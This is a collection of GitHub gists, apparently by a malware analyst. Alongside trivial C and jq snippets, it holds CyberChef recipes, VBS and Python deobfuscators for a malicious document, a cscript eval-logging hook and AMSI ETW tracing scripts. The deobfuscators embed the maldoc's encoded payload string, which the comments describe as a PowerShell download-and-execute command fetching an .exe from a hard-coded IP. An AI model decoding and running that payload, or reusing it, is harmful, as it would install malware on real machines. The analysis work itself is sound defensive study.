
edygert / sample_for_godbolt.c
Created April 22, 2024 04:02
sample code for godbolt
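/*
 * Portability shim: __fastcall is an MSVC keyword (MinGW provides it as a
 * macro). On other toolchains -- for example the default gcc/clang targets
 * on godbolt -- it is an unknown identifier and the whole sample fails to
 * compile, so define it away there. Note that on those targets the function
 * then simply uses the platform's default calling convention.
 */
#if !defined(_MSC_VER) && !defined(__MINGW32__) && !defined(__fastcall)
#define __fastcall
#endif

/*
 * Sum three ints and return the result.
 *
 * Deliberately trivial: the sample exists so the generated assembly (how the
 * three arguments arrive and the result leaves) can be read on godbolt. The
 * local is kept so the unoptimised listing still shows the stack slot.
 * Signed overflow is undefined behaviour in C, so a + b + c assumes the
 * inputs are small.
 */
int __fastcall addemup(int a, int b, int c) {
    int d;
    d = a + b + c;
    return d;
}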
/*
 * Calls addemup() with constants so the call sequence (argument setup, call,
 * result) appears in the listing. The result is intentionally not used; the
 * cast to void only silences unused-variable warnings.
 */
void caller() {
    int sum = addemup(1, 2, 3);
    (void)sum;
}
edygert / schema.jq
Last active May 6, 2023 14:09
jq script to show the schema of a JSON file (one dotted path per line; arrays are walked through their first element only and printed as `[]`)
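# Print the "schema" of a JSON document: every path, dotted, one per line,
# with array indices collapsed to "[]".
#
# Only index 0 of each array is followed, so keys that exist only in later
# elements are not reported. After join(".") an object key that is itself a
# decimal number (e.g. "0" or "3") cannot be told apart from an array index
# and is treated as one.
paths
| join(".")
# Drop every path that goes through a non-zero array index (".3" or ".3.x").
# The original wrote the tail as "[.|$]?" -- an optional character class, so
# it matched nothing useful and keys such as "12abc" were being dropped too.
# "([.]|$)" anchors the match to a whole path component.
| select(test("[.][1-9][0-9]*([.]|$)") | not)
# Rewrite the remaining index-0 components as "[]", then prefix with "." so
# the output reads like a jq path.
| gsub("[.]0[.]"; "[].")
| sub("[.]0$"; "[]")
| sub("^"; ".")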
edygert / invoice.recipe
Created February 15, 2023 14:45
Invoice CyberChef recipe: extract every `Hextostring("..."), Hextostring("...")` pair from the script, then (per line) hex-decode the first argument and XOR it with the second argument used as the hex key
Regular_expression('User defined','Hextostring\\(\\"[^"]+\\"\\), Hextostring\\(\\"[^"]+\\"\\)',true,true,false,false,false,false,'List matches')
Fork('\\n','\\n',false)
Register('Hextostring\\(\\"([^"]+)\\"\\), Hextostring\\(\\"([^"]+)\\"\\)',true,false,false)
Find_/_Replace({'option':'Regex','string':'^.*$'},'$R0',true,false,true,false)
From_Hex('Auto')
XOR({'option':'Hex','string':'$R1'},'Standard',false)
edygert / order_docm.vbs
Created August 13, 2022 22:17
Deobfuscate order
' Obfuscated strings as they appear in the order .docm script. Each character
' is stored as a 3-digit decimal group of (ASCII code + 26); B_RA below
' reverses that (Mid ... Step 3, Chr(int(group) - 26)).
' E_MO decodes to "Wscript.Shell".
E_MO = "113141125140131138142072109130127134134"
' SP_LL decodes to a cmd.exe one-liner that reassembles the word "powershell"
' from environment variables, then launches a hidden, execution-policy-
' bypassing PowerShell that downloads an .exe over plain http from a
' hard-coded IP into %TEMP% and starts it.
SP_LL ="125135126072127146127058073125058141127142058135135137087137145127140141064064141127142058139079087138064064141127142058139078087130127134134064064125135126073125058063139079063063135135137063063139078063058071127138058124147138123141141058071136137136131058071145058130131126126127136058071136137134137129137058131127146066104127145071105124132127125142058109147141142127135072104127142072113127124093134131127136142067072094137145136134137123126096131134127066065130142142138084073073082081072076077080072076075076072076078075073128131146146073092134123125133072127146127065070062127136144084142127135138058069058065118145136130145072127146127065067085109142123140142071106140137125127141141058062127136144084142127135138118145136130145072127146127085"
' Defanged: the decoded strings are only echoed. The original presumably fed
' SP_LL to a Wscript.Shell object instead -- keep this file in an isolated
' analysis VM and never paste the decoded command into a shell.
WScript.Echo B_RA(E_MO)
WScript.Echo B_RA(SP_LL)
Public Function B_RA(byref N_UN)
For O_MI = 1 To Len(N_UN) Step 3
A_DE = Mid(N_UN, O_MI, 3)
C_YS = C_YS + Chr(int(A_DE) - 26)
edygert / checkbox.recipe
Last active February 15, 2023 14:47
Checkbox CyberChef recipe: peel three nested layers -- Base64 then UTF-16LE text, Base64 then gunzip, Base64 then XOR with the single-byte key 35 (0x23)
Regular_expression('User defined','[a-zA-Z0-9+/=]{40,}',true,true,false,false,false,false,'List matches')
From_Base64('A-Za-z0-9+/=',true)
Decode_text('UTF-16LE (1200)')
Regular_expression('User defined','[a-zA-Z0-9+/=]{20,}',true,true,false,false,false,false,'List matches')
From_Base64('A-Za-z0-9+/=',true)
Gunzip()
Regular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')
From_Base64('A-Za-z0-9+/=',true)
XOR({'option':'Decimal','string':'35'},'Standard',false)
edygert / cscript_eval.js
Created August 8, 2022 16:04
Replacement eval for cscript
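// Instrumentation hook for cscript/wscript: every string handed to eval() is
// echoed (WScript.Echo) before it runs, so an obfuscated script prints each
// decoded stage. The string is STILL executed afterwards by original_eval --
// use this only inside an isolated analysis VM.
//
// Only calls that go through the global `eval` binding are seen; anything
// that bypasses it (new Function(...), a reference to the original function
// taken before this file loaded) is not intercepted.
original_eval = eval;
eval = function (input_string) {
    WScript.Echo(input_string);
    // Return the value so `x = eval("...")` in the target keeps working;
    // the original hook dropped it and silently broke such scripts.
    return original_eval(input_string);
};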
edygert / order.py
Created August 8, 2022 15:55
Python deobfuscation of order script
#!/usr/bin/env python3
# Obfuscated strings lifted from the order maldoc. Every character is stored as
# a 3-digit decimal group of (ordinal + 26); decode() below reverses that with
# chr(int(group) - 26). Keep this file in an isolated VM and do not execute
# the decoded output: sp_ll is presumably the command the dropper ran (a
# cmd.exe/PowerShell download-and-execute one-liner).
sp_ll: str = "125135126072127146127058073125058141127142058135135137087137145127140141064064141127142058139079087138064064141127142058139078087130127134134064064125135126073125058063139079063063135135137063063139078063058071127138058124147138123141141058071136137136131058071145058130131126126127136058071136137134137129137058131127146066104127145071105124132127125142058109147141142127135072104127142072113127124093134131127136142067072094137145136134137123126096131134127066065130142142138084073073082081072076077080072076075076072076078075073128131146146073092134123125133072127146127065070062127136144084142127135138058069058065118145136130145072127146127065067085109142123140142071106140137125127141141058062127136144084142127135138118145136130145072127146127085"
# Decodes to "Wscript.Shell" (the COM object presumably used to run sp_ll).
e_mo: str = "113141125140131138142072109130127134134"
def decode(s):
result = ""
for n in range(0, len(s), 3):
ch = chr(int(s[n:n+3]) - 26)
edygert / amsicommands.txt
Created August 8, 2022 15:54
AMSI commands: capture what AMSI scanned (including decoded script content) through the Microsoft-Antimalware-Scan-Interface ETW provider. The logman start/stop lines usually need an elevated prompt, and the trace is passive -- it records the sample but does not stop it from running, so execute loveyou.js only in an isolated analysis VM.
logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
cscript loveyou.js
logman stop AMSITrace -ets
AMSIScriptContentRetrieval > loveyou.log
The `Event1` keyword passed to `-p` above was found by listing the provider's keywords with:
logman query providers Microsoft-Antimalware-Scan-Interface
edygert / amsiscript_change.ps1
Created August 8, 2022 15:52
Remove duplicates from AMSI output
# Emit each AMSI scan event once, keyed on its Hash property, keeping the
# first-seen order. $AMSIScanEvents must already be populated (presumably by
# AMSIScriptContentRetrieval.ps1 -- confirm the property is named Hash).
$Seen = @{}
foreach ($elem in $AMSIScanEvents) {
    $key = $elem.Hash
    # skip anything whose content hash has already been emitted
    if ($Seen.ContainsKey($key)) { continue }
    $Seen[$key] = ""
    $elem
}
edygert / AMSIScriptContentRetrieval.ps1
Created April 21, 2022 19:25 — forked from mattifestation/AMSIScriptContentRetrieval.ps1
PoC code used to demonstrate extracting script contents using the AMSI ETW provider
# Script author: Matt Graeber (@mattifestation)
# logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
# Do your malicious things here that would be logged by AMSI
# logman stop AMSITrace -ets
# Work out the pointer width of the running OS (32 or 64) from CIM.
# Presumably used later in the script to size pointer-width fields when the
# AMSI ETW payload is parsed -- the remainder of the script is not shown here.
$OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture
$OSArch = $OSArchProperty.OSArchitecture
$OSPointerSize = 32
# NOTE(review): OSArchitecture is a display string and may be localized on
# non-English systems -- confirm; anything other than '64-bit' falls back to 32.
if ($OSArch -eq '64-bit') { $OSPointerSize = 64 }